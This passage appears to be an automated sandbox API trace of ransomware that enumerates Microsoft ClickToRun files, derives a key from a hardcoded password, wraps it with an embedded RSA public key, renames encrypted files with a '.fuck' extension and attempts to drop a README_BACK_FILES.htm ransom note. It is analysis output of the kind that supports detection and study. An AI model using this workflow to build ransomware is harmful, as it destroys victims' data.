pbData=0x27e2810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27e2810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0238.804] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.804] CloseHandle (hObject=0xffffffff) returned 1 [0238.804] CloseHandle (hObject=0xffffffff) returned 1 [0238.804] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml"), bFailIfExists=0) returned 0 [0238.805] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x0) returned 0 [0238.805] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml.gsg")) returned 0 [0238.806] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml.fuck")) returned 0 [0238.806] CryptDestroyHash (hHash=0x282e0f8) returned 1 [0238.806] CryptDestroyKey (hKey=0x282e438) returned 1 [0238.806] CryptReleaseContext (hProv=0x2880eb8, dwFlags=0x0) returned 1 [0238.806] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.806] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0238.807] GetLastError () returned 0x5 [0238.807] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash")) returned 0x20 [0238.807] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash", dwFileAttributes=0x80) returned 0 [0238.807] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.808] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.809] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash.gsg", dwFileAttributes=0x2) returned 0 [0238.809] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x287fb98) returned 1 [0238.811] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0238.811] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.811] CryptHashData (hHash=0x282e438, pbData=0x2884ad0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.812] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282e438, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x282dfb8) returned 1 [0238.812] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.812] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0238.812] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2881408) returned 1 [0238.812] CryptImportPublicKeyInfo (in: hCryptProv=0x2881408, dwCertEncodingType=0x1, pInfo=0x286bdc8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286bdf8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286be00*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x282e238) returned 1 [0238.812] CryptEncrypt (in: hKey=0x282e238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0238.812] CryptEncrypt (in: hKey=0x282e238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28818d0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28818d0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0238.813] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28818d0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.813] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27e2810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0238.813] CryptEncrypt (in: hKey=0x282dfb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e2810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27e2810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0238.813] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.813] CloseHandle (hObject=0xffffffff) returned 1 [0238.813] CloseHandle (hObject=0xffffffff) returned 1 [0238.813] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash"), bFailIfExists=0) returned 0 [0238.813] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash", dwFileAttributes=0x0) returned 0 [0238.814] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash.gsg")) returned 0 [0238.814] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\s641033.hash.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\s641033.hash.fuck")) returned 0 [0238.815] CryptDestroyHash (hHash=0x282e438) returned 1 [0238.815] CryptDestroyKey (hKey=0x282dfb8) returned 1 [0238.815] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.815] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.815] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0238.815] GetLastError () returned 0x5 [0238.815] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat")) returned 0x20 [0238.815] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x80) returned 0 [0238.816] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.816] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.817] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0238.817] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28819e0) returned 1 [0238.820] CryptCreateHash (in: hProv=0x28819e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0238.820] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.820] CryptHashData (hHash=0x282e438, pbData=0x2884d78, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.820] CryptDeriveKey (in: hProv=0x28819e0, Algid=0x6610, hBaseData=0x282e438, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x282e0f8) returned 1 [0238.820] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.820] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0238.820] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28810d8) returned 1 [0238.820] CryptImportPublicKeyInfo (in: hCryptProv=0x28810d8, dwCertEncodingType=0x1, pInfo=0x286be98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286bec8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286bed0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2845de0) returned 1 [0238.820] CryptEncrypt (in: hKey=0x2845de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0238.821] CryptEncrypt (in: hKey=0x2845de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2882370*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2882370*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0238.821] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2882370, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.821] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27e2810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0238.821] CryptEncrypt (in: hKey=0x282e0f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e2810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27e2810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0238.821] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e2810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.821] CloseHandle (hObject=0xffffffff) returned 1 [0238.821] CloseHandle (hObject=0xffffffff) returned 1 [0238.821] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat"), bFailIfExists=0) returned 0 [0238.822] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x0) returned 0 [0238.822] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat.gsg")) returned 0 [0238.822] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\stream.x64.en-us.man.dat.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\stream.x64.en-us.man.dat.fuck")) returned 0 [0238.823] CryptDestroyHash (hHash=0x282e438) returned 1 [0238.823] CryptDestroyKey (hKey=0x282e0f8) returned 1 [0238.823] CryptReleaseContext (hProv=0x28819e0, dwFlags=0x0) returned 1 [0238.823] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0238.824] FindClose (in: hFindFile=0x282e3f8 | out: hFindFile=0x282e3f8) returned 1 [0238.824] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\readme_back_files.htm")) returned 0xffffffff [0238.824] AreFileApisANSI () returned 1 [0238.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0238.824] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.824] GetLastError () returned 0x5 [0238.824] GetLastError () returned 0x5 [0238.825] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.825] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28467e0 [0238.826] FindNextFileA (in: hFindFile=0x28467e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.826] FindNextFileA (in: hFindFile=0x28467e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.826] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0238.826] GetLastError () returned 0x5 [0238.826] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml")) returned 0x20 [0238.826] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x80) returned 0 [0238.826] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.827] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.827] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.828] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28819e0) returned 1 [0238.830] CryptCreateHash (in: hProv=0x28819e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0238.830] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.830] CryptHashData (hHash=0x282e0f8, pbData=0x2884d50, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.830] CryptDeriveKey (in: hProv=0x28819e0, Algid=0x6610, hBaseData=0x282e0f8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x282e3f8) returned 1 [0238.830] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.830] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0238.831] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28820c8) returned 1 [0238.831] CryptImportPublicKeyInfo (in: hCryptProv=0x28820c8, dwCertEncodingType=0x1, pInfo=0x286c108*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286c138*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286c140*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x282e438) returned 1 [0238.831] CryptEncrypt (in: hKey=0x282e438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0238.831] CryptEncrypt (in: hKey=0x282e438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2882838*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2882838*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0238.831] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2882838, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.831] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0238.832] CryptEncrypt (in: hKey=0x282e3f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0238.832] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.832] CloseHandle (hObject=0xffffffff) returned 1 [0238.832] CloseHandle (hObject=0xffffffff) returned 1 [0238.832] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml"), bFailIfExists=0) returned 0 [0238.832] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x0) returned 0 [0238.833] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: 